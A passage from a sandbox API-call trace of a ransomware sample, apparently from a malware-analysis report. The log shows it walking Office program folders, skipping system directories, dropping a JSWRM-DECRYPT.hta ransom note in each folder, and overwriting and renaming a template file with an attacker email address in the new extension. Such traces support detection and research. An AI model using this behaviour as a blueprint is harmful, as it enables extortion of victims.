lpString2="...") returned 1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="windows") returned -1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="recovery") returned -1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="perflogs") returned -1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="documents and settings") returned -1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="system volume information") returned -1 [0129.636] lstrcmpiW (lpString1="DBGHELP.DLL", lpString2="msocache") returned -1 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBGHELP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBGHELP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBGHELP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBGHELP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.636] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x122a48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DBWIZ.DLL", cAlternateFileName="")) returned 1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2=".") returned 1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="..") returned 1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="...") returned 1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="windows") returned -1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="recovery") returned -1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="perflogs") returned -1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="documents and settings") returned -1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="system volume information") returned -1 [0129.636] lstrcmpiW (lpString1="DBWIZ.DLL", lpString2="msocache") returned -1 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBWIZ.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBWIZ.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBWIZ.DLL", lpUsedDefaultChar=0x0) returned 9 [0129.636] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6d9e0b3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f8b8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="DLGSETP.DLL", cAlternateFileName="")) returned 1 [0129.636] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2=".") returned 1 [0129.636] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="..") returned 1 [0129.636] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="...") returned 1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="windows") returned -1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="recovery") returned -1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="perflogs") returned -1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="documents and settings") returned -1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="system volume information") returned -1 [0129.637] lstrcmpiW (lpString1="DLGSETP.DLL", lpString2="msocache") returned -1 [0129.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DLGSETP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DLGSETP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DLGSETP.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DLGSETP.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DLGSETP.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DLGSETP.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.637] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Document Parts", cAlternateFileName="DOCUME~1")) returned 1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2=".") returned 1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="..") returned 1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="...") returned 1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="windows") returned -1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="recovery") returned -1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="perflogs") returned -1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="documents and settings") returned -1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="$RECYCLE.BIN") returned 1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="system volume information") returned -1 [0129.637] lstrcmpiW (lpString1="Document Parts", lpString2="msocache") returned -1 [0129.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\jswrm-decrypt.hta")) returned 0xffffffff [0129.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.639] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.639] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0129.640] CloseHandle (hObject=0x45c) returned 1 [0129.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\jswrm-decrypt.hta")) returned 0x20 [0129.640] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0129.640] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.640] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.640] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.640] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.640] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0129.640] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0129.640] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0129.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0129.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.641] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.641] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0129.642] CloseHandle (hObject=0x238) returned 1 [0129.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\jswrm-decrypt.hta")) returned 0x20 [0129.643] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210866, cFileName=".", cAlternateFileName="")) returned 0x232140 [0129.643] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.643] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210866, cFileName="..", cAlternateFileName="")) returned 1 [0129.643] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.643] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.643] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x210866, cFileName="16", cAlternateFileName="")) returned 1 [0129.643] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0129.643] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0129.643] lstrcmpiW (lpString1="16", lpString2="...") returned 1 [0129.643] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0129.643] lstrcmpiW (lpString1="16", lpString2="recovery") returned -1 [0129.643] lstrcmpiW (lpString1="16", lpString2="perflogs") returned -1 [0129.643] lstrcmpiW (lpString1="16", lpString2="documents and settings") returned -1 [0129.643] lstrcmpiW (lpString1="16", lpString2="$RECYCLE.BIN") returned 1 [0129.643] lstrcmpiW (lpString1="16", lpString2="system volume information") returned -1 [0129.643] lstrcmpiW (lpString1="16", lpString2="msocache") returned -1 [0129.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\jswrm-decrypt.hta")) returned 0xffffffff [0129.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.644] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0129.645] CloseHandle (hObject=0x314) returned 1 [0129.645] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\jswrm-decrypt.hta")) returned 0x20 [0129.645] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4db6809, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x249270, cFileName=".", cAlternateFileName="")) returned 0x232240 [0129.645] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.645] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4db6809, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x249270, cFileName="..", cAlternateFileName="")) returned 1 [0129.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.646] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4db6809, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4db6809, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x60002, dwReserved1=0x249270, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2=".") returned 1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="..") returned 1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="...") returned 1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="windows") returned -1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="recovery") returned -1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="perflogs") returned -1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="documents and settings") returned -1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="$RECYCLE.BIN") returned 1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="system volume information") returned -1 [0129.646] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="msocache") returned -1 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x2412e0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Built-In Building Blocks.dotx", lpUsedDefaultChar=0x0) returned 29 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Built-In Building Blocks.dotx", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Built-In Building Blocks.dotx", lpUsedDefaultChar=0x0) returned 29 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0129.647] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=3706055) returned 1 [0129.647] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.647] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0129.664] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.664] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0129.665] CloseHandle (hObject=0x338) returned 1 [0129.665] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\built-in building blocks.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Document Parts\\1033\\16\\Built-In Building Blocks.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\document parts\\1033\\16\\built-in building blocks.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.666] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ef38bd, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43ef38bd, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43ef38bd, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x249270, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.666] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.666] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.667] lstrcmpiW 